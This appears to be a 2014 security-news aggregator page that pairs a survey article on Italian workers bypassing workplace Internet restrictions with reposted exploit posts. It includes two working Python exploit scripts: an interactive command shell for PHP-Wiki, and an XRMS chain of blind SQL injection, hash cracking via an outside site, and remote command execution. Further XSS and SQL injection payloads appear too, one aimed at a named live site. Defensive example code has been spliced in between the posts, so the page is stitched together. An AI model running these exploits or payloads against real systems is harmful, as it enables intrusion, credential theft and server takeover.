MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

29 Aug 2014

One in three Italians bypasses Internet restrictions at work

A OnePoll survey finds that many Italian employees, despite company rules, access Facebook and use apps and messaging from work.

Not good news for CIOs. According to a OnePoll survey commissioned by Samsung, one in three Italians (32 percent) bypasses the Internet access restrictions (Facebook, apps and messaging) that their company imposes in the workplace.
In the 18 to 34 age group the figure rises to 49 percent.

On the one hand this points to better IT skills; on the other it is a figure that should worry those in charge of corporate information systems.
They will be the ones repairing whatever damage the policy circumvention causes. 26 percent tend to ignore or bypass the restrictions by using personal devices for Twitter, 29 percent for video streaming services, 34 percent for cloud storage applications and 38 percent for mobile apps.

Samsung's survey, which involved 4,500 people in seven European countries (Italy, Great Britain, Germany, France, Spain, Belgium and the Netherlands), reveals that although access to Facebook is restricted or outright banned for 40 percent of employees in Europe, many ignore or bypass the rules: 34 percent in Germany, 32 percent in Spain, 31 percent in Belgium and the Netherlands.

The least disciplined are the British (41 percent), while the French (20 percent) stand out for respecting company rules. The European market sector in which limits and bans are most common is hospitality: 47 percent of companies have rules on the matter, but 38 percent of staff break them, a figure second only to the 46 percent of rule-breakers found in the real estate sector.

"From a security standpoint, it is understandable that employers want to control how their employees use technology," comments Dimitrios Tsivrikos, Consumer and Business Psychologist at University College London. "But if this turns into ignoring the needs of the modern professional, companies may face a drop in productivity and engagement." (L. F.)

Source: http://www.cwi.it/un-italiano-su-tre-aggira-le-restrizioni-internet-sul-lavoro-21217

28 Aug 2014

PHP-Wiki Command Injection

###############################################################
#    ____                    __                  _ __   _ 
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   
#             /_/ /_/         /_/                     
# Diskovered in Nov/Dec 2011
###############################################################
 
import urllib
import urllib2
import sys
def banner():
	print "	    ____                    __                  _ __   _ "
	print "	   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)"
	print "	  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
	print "	 / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  "
	print "	/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   "
	print "	             /_/ /_/         /_/                     \n"
 
 
def usage():
	banner()
	print "	[+] Usage example"
	print "	[-] python " + sys.argv[0] + " http://path.to/wiki"
 
if len(sys.argv)< 2:
	usage()
	quit()
 
domain = sys.argv[1]
def commandexec(cmd):
	data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
	cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
	cmd2 = urllib2.urlopen(cmd1)
	output = cmd2.read()
	firstloc = output.find("123:::\n") + len("123:::\n")
	secondloc = output.find("\n:::123")
	return output[firstloc:secondloc]
 
 
banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
	cmd = raw_input('Run a command: ')
	if cmd == 'quit':
		print "[-] Hope you had fun :)"
		quit = 1
	if cmd != 'quit':
		print commandexec(cmd)


28 Aug 2014

XRMS Blind SQL Injection / Command Execution

#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
 
import urllib
import urllib2
import time
import sys
 
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
  print """      ____                                      
     / __/_  ______ _  _  ___________ ___  _____
    / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
   / __/ /_/ / /_/ / _>  </ /  / / / / / (__  ) 
  /_/  \__,_/\__, (_)_/|_/_/  /_/ /_/ /_/____/  
               /_/                              
  [+] fuq th3 w0rld, fuq ur m0m!\n"""
 
def usage():
  print "  [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
  print "  [+] Example:"
  print "  [+] python " + sys.argv[0] + " domain.to/xrms"
  quit()
 
def getpositions(output, startmarker, endmarker):
  # Helper the original listing calls but never defines: return the text
  # between the first occurrence of startmarker and the next endmarker.
  first = output.find(startmarker) + len(startmarker)
  last = output.find(endmarker, first)
  return output[first:last]
 
def sendhashaway(hash):
  print " [+] Sending hash to icrackhash.com to be cracked."
  data = None
  headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
  url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
  gh = urllib2.Request(url,data,headers)
  gh2 = urllib2.urlopen(gh)
  output = gh2.read()
  plaintext = getpositions(output,'<td><small><strong>','</strong>')
  print " [-] Plaintext of hash: " +plaintext + "\n"
  return plaintext
 
def username(length):
  length = length + 1
  duser = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
  for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          duser.append(usercharac[f])
          found = 1
  return duser
 
def getusernamelength():
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
  payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
  while (found != 1): 
    class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
      def http_error_302(self, req, fp, code, msg, headers):
        infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
        infourl.status = code
        infourl.code = code
        return infourl
      http_error_300 = http_error_302    
    class HeadRequest(urllib2.Request):
      def get_method(self):
        return "POST"
    payload = payload1 + str(i) + payload2
    data = urllib.urlencode([('user_id',payload)])
    url = 'http://'+domain+'/plugins/webform/new-form.php'
    opener = urllib2.build_opener(LeHTTPRedirectHandler)
    req = HeadRequest(url,data)
    prepare = opener.open(req)
    cookie1 = prepare.info()
    cookie2pos1 = str(cookie1).find('PHPSESSID')
    cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
    line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
    line = 'XRMS' + line[9:]
    url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
    headers = { 'Cookie' : line }
    data = None
    start = time.time()
    get = urllib2.Request(url,data,headers)
    get.get_method = lambda: 'HEAD'
    try:
      execute = urllib2.urlopen(get)
    except:
      pass
    elapsed = (time.time() - start)
    if(elapsed > 1):
      print "  Length found at position: " + str(i)
      found = 1
      length = i
      return length
    i = i + 1
 
def password(length):
  length = length + 1
  dpassword = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
  for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          dpassword.append(usercharac[f])
          found = 1
  return dpassword
 
def login(domain,user,password):
  cookie = "XRMS=iseeurgettinown4d"
  url = 'http://'+domain+'/login-2.php'
  headers = { 'Cookie' : cookie }
  data = urllib.urlencode([('username',user),('password',password)])
  a1 = urllib2.Request(url,data,headers)
  a2 = urllib2.urlopen(a1)
  output = a2.read()
  if output.find('PEAR.php') > 0:
    print "  [+] Logged In"
 
def commandexec(domain,command):
  cookie = "XRMS=iseeurgettinown4d"
  cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
  headers = { 'Cookie' : cookie }
  data = None
  url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
  b1 = urllib2.Request(url,data,headers)
  b2 = urllib2.urlopen(b1)
  output = b2.read()
  first = output.find('0x41') + 4
  last = output.find('14x0') - 4
  return output[first:last]
 
banner()
if len(sys.argv) < 2:
  usage()
domain = sys.argv[1]
print "  [+] Grabbing username length"
length = getusernamelength()
print "  [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print "  [+] Grabbing password hash"
tmppass =  password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print "  [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
  cmd = raw_input('  [+] Run a command: ')
  if cmd == 'quit':
    print "  [-] Hope you had fun :)"
    quit = 1
  if cmd != 'quit':
    print "  [+] "+ commandexec(domain,cmd)


28 Aug 2014

F5 BIG-IP 11.5.1 Cross Site Scripting

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
SEC Consult Vulnerability Lab Security Advisory < 20140828-0 >
=======================================================================
              title: Reflected Cross-Site Scripting
            product: F5 BIG-IP
 vulnerable version: <= 11.5.1
      fixed version: > 11.6.0
             impact: Medium
         CVE number: CVE-2014-4023
           homepage: https://f5.com/
              found: 2014-07-07
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================
 
Vendor/product description:
- -----------------------------
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance.  From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility—and ensures your applications
are fast, secure, and available."
 
URL: https://f5.com/products/big-ip
 
 
Vulnerability overview/description:
- -----------------------------------
BIG-IP suffers from a reflected Cross-Site Scripting vulnerability,
which allows an attacker to steal other users' sessions, to impersonate other
users and to gain unauthorized access to the admin interface.
 
 
Proof of concept:
- -----------------
The following HTTP request triggers the vulnerability:
 
POST /tmui/dashboard/echo.jsp HTTP/1.1
Host: BIGIP
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 29
 
<script>alert('xss')</script>
 
The server does not properly encode user supplied information and returns it
to the user resulting in Cross-Site Scripting.
 
 
Vulnerable / tested versions:
- -----------------------------
More information can be found at:
https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html
 
 
Vendor contact timeline:
- ------------------------
2014-07-08: Sending advisory and proof of concept exploit via encrypted
            channel.
2014-07-09: Vendor confirms receipt of advisory. States that fix will be
            released in the "next 6 weeks or so"
2014-07-24: Vendor provides CVE: CVE-2014-4023
2014-08-26: Vendor releases fixed version.
2014-08-28: SEC Consult releases a coordinated security advisory.
 
 
Solution:
- ---------
Update to the newest version.
 
More information can be found at:
https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html
 
 
Workaround:
- -----------
No workaround available.
 
 
Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
 
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
 
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15
 
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
 
Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com
 
EOF Stefan Viehböck / @2014


27 Aug 2014

Nmap Port Scanner 6.47


Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth.

In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.).

Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning.

Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings.
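As an added defender-side example (not part of this post or of the Nmap project), the following Python script maps the probe flag combinations behind the NULL, FIN, Xmas and SYN scan types named above to the scan that sends them, and reports any source that hits many distinct ports with one probe type. The input records are constructed to resemble a one-packet-per-line flow log, not a real capture; the bare-ACK probe (-sA) is deliberately left out of the signature table because without connection tracking it is indistinguishable from an ordinary acknowledgement.

```python
"""Flag TCP probe packets by their flag combination and report sources that
sweep many ports with the same probe type.

Added example, not part of the MondoUnix post or the Nmap project: the
flag-set signatures follow the scan types named in the text (NULL, FIN, Xmas,
SYN/connect()), and the records below are constructed to look like a
one-line-per-packet flow log, not a real capture.
"""
from collections import defaultdict

# Flag sets that only appear as scan probes. A bare ACK (-sA) looks like an
# ordinary acknowledgement unless connection state is tracked, so it is not
# matched here; SYN probes are kept because the sweep threshold below
# separates them from a client's normal handful of connection attempts.
FLAG_SIGNATURES = {
    frozenset(): "NULL scan (-sN)",
    frozenset({"FIN"}): "FIN scan (-sF)",
    frozenset({"FIN", "PSH", "URG"}): "Xmas scan (-sX)",
    frozenset({"SYN"}): "SYN / connect() scan (-sS, -sT)",
}


def classify_flags(flags):
    """Return the scan type a TCP flag set matches, or None for other traffic."""
    return FLAG_SIGNATURES.get(frozenset(flags))


def parse_record(line):
    """Parse a constructed record 'src dst dport flags'; flags are comma-joined
    TCP flag names, or '-' when no flag is set."""
    src, dst, dport, flags = line.split()
    flagset = set() if flags == "-" else set(flags.split(","))
    return src, dst, int(dport), flagset


def detect_port_sweeps(lines, threshold=5):
    """Return (source, scan type, distinct targets) for every source whose
    probes of one type reached at least `threshold` distinct host:port pairs."""
    seen = defaultdict(lambda: defaultdict(set))   # src -> scan type -> targets
    for line in lines:
        src, dst, dport, flags = parse_record(line)
        scan = classify_flags(flags)
        if scan is None:
            continue
        seen[src][scan].add((dst, dport))
    alerts = []
    for src, kinds in seen.items():
        for scan, targets in kinds.items():
            if len(targets) >= threshold:
                alerts.append((src, scan, len(targets)))
    return sorted(alerts)


# Constructed sample records (not a real capture): 10.0.0.5 sends Xmas probes
# to six ports, 10.0.0.6 opens three normal-looking connections, and 10.0.0.7
# exchanges established-connection traffic.
SAMPLE_RECORDS = [
    "10.0.0.5 10.0.0.20 21 FIN,PSH,URG",
    "10.0.0.5 10.0.0.20 22 FIN,PSH,URG",
    "10.0.0.5 10.0.0.20 23 FIN,PSH,URG",
    "10.0.0.5 10.0.0.20 25 FIN,PSH,URG",
    "10.0.0.5 10.0.0.20 80 FIN,PSH,URG",
    "10.0.0.5 10.0.0.20 443 FIN,PSH,URG",
    "10.0.0.6 10.0.0.20 22 SYN",
    "10.0.0.6 10.0.0.20 80 SYN",
    "10.0.0.6 10.0.0.20 443 SYN",
    "10.0.0.7 10.0.0.20 443 ACK,PSH",
    "10.0.0.7 10.0.0.20 443 ACK",
]

if __name__ == "__main__":
    for src, scan, count in detect_port_sweeps(SAMPLE_RECORDS):
        print("%s: %s against %d targets" % (src, scan, count))
```

The threshold is what separates a client that opens three connections from a sweep; with the default of 5 only the Xmas source is reported, while lowering it to 3 also surfaces the SYN source. In a real deployment the flag sets would come from a packet capture or flow exporter rather than the constructed lines above.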

Source: http://packetstormsecurity.com/files/128000/Nmap-Port-Scanner-6.47.html


27 Aug 2014

WordPress WPtouch Mobile 3.4.5 Shell Upload

Wordpress WPtouch Mobile Plugin File Upload Vulnerability
 
=================================
 
 
====================
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/    \/   --X--
 Don Tukulesto      /     /  /__/  /__/  /  /  /__/  /__/| 
                   /  /  /  /  /  /  /   __/__   /__   / :
                  /__/__/\____/\____/\____/  /  /  /  /
                   www.indonesiancoder.com\____/\____/                                    
                       73 78 68 79 78 69 83 73 65 78  67 79 68 69 82
 
 
 
Found by  : k4L0ng666 (k4L0ng666@indonesiancoder.com)
 
Submitted by  : Don Tukulesto (root@indonesiancoder.com)
 
Homepage  : http://indonesiancoder.com
 
Published  : August 26, 2014
 
Tested On  : OS X 10.9.4
 
=================================
 
 
====================
 
==================
| Software Info |==================
 
 
 
[>] Download      : http://downloads.wordpress.org/plugin/wptouch.3.4.5.zip
 
[>] Software      : WPtouch Mobile Plugin - Wordpress Plugin
 
[>] Plugin Version  : 3.4.5
 
[>] Vulnerability  : File upload
 
 
 
I. Proof of Concept
 
=================================
 
 
====================
Any .php file can be submitted through the plugin's uploader; the uploaded file (the backdoor) is then found under /wp-content/wptouch-data/
 
 
 
See Image below
 
II. Vendor patch
 
=================================
 
 
====================
At the time of publication the vendor does not provide a patch or upgrade,
because this is the current version. \m/
 
 
=================================
 
 
====================
 
WE ARE ONE UNITY, WE ARE A CODER FAMILY AND WE ARE INDONESIAN CODER
 
 
 
[>] Malang Cyber Crew ~ Magelang Cyber ~ Exploit-ID ~ Kill-9 Crew ~ Jatimcom
 
 
 
 
“People should not be afraid of their governments. Governments should be afraid of their people.” -V
 
 
“Knowledge, like air, is vital to life. Like air, no one should be denied it.” 
 
~(^_^)~
=================================


27 Aug 2014

Joomla Spider 2.8.3 SQL Injection

######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
 
# Dork Google: inurl:/component/spidervideoplayer
               inurl:option=com_spidervideoplayer    
 
# Date : 2014-08-26
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
 
 
######################
 
# PoC Exploit:
 
http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
 
"theme" variable is not sanitized.
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################


26 Aug 2014

Online Time Tracking Cross Site Scripting

# Affected software: Online Time Tracking - URL: https://paydirtapp.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Type of vulnerability: XSS Stored
# Description: Paydirt is time tracking and invoicing software made for
browser-based freelancers and small businesses. It keeps track of who
you're working for so that you don't have to.
Paydirt is currently integrated with Chrome and Firefox, and will prompt
you to track time based on the websites you're using and the emails you
write.
# Proof of concept:
1. Go to https://paydirtapp.com/clients
2. Add a new client whose name is an XSS payload, for example "><img src=d
onmouseover=prompt(1);>
3. Go to https://paydirtapp.com/clients again: the XSS fires.
4. Add a new client, then go to https://paydirtapp.com/quotes, create a new
quote and open the client selector: the XSS fires there as well.
Screenshot: http://prntscr.com/4fe3zq
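The BIG-IP advisory above and this Paydirt one describe the same defect in two different HTML contexts: echo.jsp returns the request body as element text, and the Paydirt client name is stored and later rendered inside a form control. The Python below is an added example, not code from F5 or Paydirt; the two templates are constructed stand-ins (the BIG-IP page is assumed to echo into element text, and the client name is assumed to land in an <option> value when selecting a client), and the payloads are the ones quoted in the two advisories. It renders each payload raw, with text-only escaping, and with full escaping, then parses the result the way a browser tokenizer would to list the tags and on* handlers that ended up in the page.

```python
"""Rendering attacker-controlled text into two HTML contexts, with and
without output encoding, and a parser-based check of what the browser would
see.

Added example, not code from F5 or Paydirt: the two templates are constructed
stand-ins (the BIG-IP page is assumed to echo the body as element text; the
Paydirt client name is assumed to land in an <option> value when selecting a
client). The payloads are the ones quoted in the two advisories.
"""
import html
from html.parser import HTMLParser

ECHO_PAYLOAD = "<script>alert('xss')</script>"              # BIG-IP advisory
CLIENT_PAYLOAD = '"><img src=d onmouseover=prompt(1);>'     # Paydirt advisory

TEXT_TEMPLATE = "<div class='echo'>{value}</div>"            # constructed
ATTR_TEMPLATE = '<option value="{value}">{value}</option>'  # constructed


def render_unsafe(template, value):
    """The defect both advisories describe: raw input copied into markup."""
    return template.replace("{value}", value)


def render_text_escaped(template, value):
    """Escapes & < > only: enough for element text, not for attribute values."""
    return template.replace("{value}", html.escape(value, quote=False))


def render_safe(template, value):
    """Escapes & < > " ' so the value cannot leave either context."""
    return template.replace("{value}", html.escape(value, quote=True))


class MarkupAudit(HTMLParser):
    """Collects start tags and on* event-handler attributes as the browser's
    tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def audit(render, template, value):
    """Return (tags, event handlers) present after rendering `value`."""
    parser = MarkupAudit()
    parser.feed(render(template, value))
    parser.close()
    return parser.tags, parser.handlers


if __name__ == "__main__":
    for name, render in (("unsafe", render_unsafe),
                         ("text-escaped", render_text_escaped),
                         ("safe", render_safe)):
        print(name, "text context:", audit(render, TEXT_TEMPLATE, ECHO_PAYLOAD))
        print(name, "attribute context:", audit(render, ATTR_TEMPLATE, CLIENT_PAYLOAD))
```

The text-escaped variant is the instructive one: it fully neutralises the script payload in element text, yet in the attribute context the unescaped double quote still closes the value and the `onmouseover=` that follows becomes an event handler on the option itself. Escaping must match the context the value is rendered into, and for attribute values that means quotes as well as angle brackets.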


26 Aug 2014

CMS 2.1.1 SQL Injection

# SQL Injection on @CMS 2.1.1 Stable
# Risk: High
# CWE number: CWE-89
# Date: 22/08/2014
# Vendor: www.atcode.net
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint
# Vulnerable File: articles.php
# Exploit:  http://host/articles.php?cat_id=[SQLI]
# PoC:      http://carla-columna.de/articles.php?cat_id=[SQLI]
 
 
--- "SQLi using sqlmap."---
 
Place: GET
Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#
 
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs
---
 
# Thanks
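The Joomla Spider advisory above and this @CMS one both report a request parameter pasted straight into a SQL statement; the sqlmap output shows the three symptoms that follow (a bare quote breaks the statement, a boolean condition changes the result set, a UNION or SLEEP runs attacker SQL). The Python below is an added example, not code from either advisory or from the affected products: it builds a constructed articles table in an in-memory SQLite database, runs the same inputs through a string-built query and a parameter-bound one, and returns what each form does with them. The `cat_id` column name comes from the @CMS advisory; the `theme` parameter in the Spider advisory has the same shape of defect.

```python
"""String-built SQL beside its parameterised form, run against an in-memory
SQLite table so the difference is observable.

Added example, not code from either advisory or from the affected products:
the table and rows are constructed, and `cat_id` is the parameter name the
@CMS advisory reports; the Spider video player `theme` parameter has the same
shape of defect (a value pasted into SQL without quoting or binding).
"""
import sqlite3


def make_db():
    """Constructed articles table standing in for the CMS database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, cat_id TEXT, title TEXT)")
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?, ?)",
        [(1, "5", "public article"), (2, "7", "other category")],
    )
    return conn


def query_unsafe(conn, cat_id):
    """The defect behind both advisories: the request value is interpolated
    into the SQL text, so quotes and keywords inside it become SQL."""
    sql = "SELECT title FROM articles WHERE cat_id = '%s'" % cat_id
    return [row[0] for row in conn.execute(sql)]


def query_safe(conn, cat_id):
    """Bound parameter: the driver passes the value separately from the
    statement, so the whole string is compared as data."""
    sql = "SELECT title FROM articles WHERE cat_id = ?"
    return [row[0] for row in conn.execute(sql, (cat_id,))]


def probe(conn, value):
    """Run one input through both forms. The unsafe result is the string
    'error' when the input breaks the statement's syntax, which is the first
    symptom both advisories report (a bare quote appended to the parameter)."""
    try:
        unsafe = query_unsafe(conn, value)
    except sqlite3.Error:
        unsafe = "error"
    return unsafe, query_safe(conn, value)


# Inputs: a normal value, the bare quote from the Joomla PoC, and the two
# halves of a boolean oracle built from the sqlmap payload quoted above.
INPUTS = [
    "5",
    "1'",
    "5' AND 6158=6158 AND 'SEMo'='SEMo",
    "5' AND 6158=6159 AND 'SEMo'='SEMo",
]

if __name__ == "__main__":
    db = make_db()
    for value in INPUTS:
        unsafe, safe = probe(db, value)
        print("%-40r unsafe=%r safe=%r" % (value, unsafe, safe))
```

Against the string-built query the true and false halves of the boolean payload return different rows, which is exactly the oracle a blind injection is built on; against the bound-parameter query both return nothing, because the whole string is compared with the column as a single literal. Binding is the fix; "sanitizing" the value by stripping characters is the weaker alternative and is what both advisories found missing.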


26 Aug 2014

ntopng 1.2.0 Cross Site Scripting

ntopng 1.2.0 XSS injection using monitored network traffic
 
ntopng is the next generation version of the original ntop, a network 
traffic probe and monitor that shows the network usage, similar to what 
the popular top Unix command does.
 
The web-based frontend of the software is vulnerable to injection of 
script code via forged HTTP Host: request header lines in monitored 
network traffic.
 
HTTP Host request header lines are extracted using nDPI traffic 
classification library and used without sanitization in several places 
in the frontend, e.g. the Host overview and specific subpages for each 
monitored host.
 
The injected code can execute JavaScript and perform management actions 
with the rights of the current ntopng user, for example disabling the 
monitoring function or deleting accounts, which renders the monitoring 
system unusable.
 
To give a coarse idea of the vulnerability the following python script 
can be used on the monitored network, afterwards the victim needs to 
browse to the Host overview / Host details in the ntopng frontend.
 
import httplib
 
conn = httplib.HTTPConnection("example.com")
headers = {"Host": "<SCRIPT>alert(\"xss\")</SCRIPT>", "Accept": 
"text/plain"}
conn.request("GET", "/", None, headers)
r1 = conn.getresponse()
print(r1.status, r1.reason)
data1 = r1.read()
 
Other users of the nDPI code might be affected as well.
 
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de
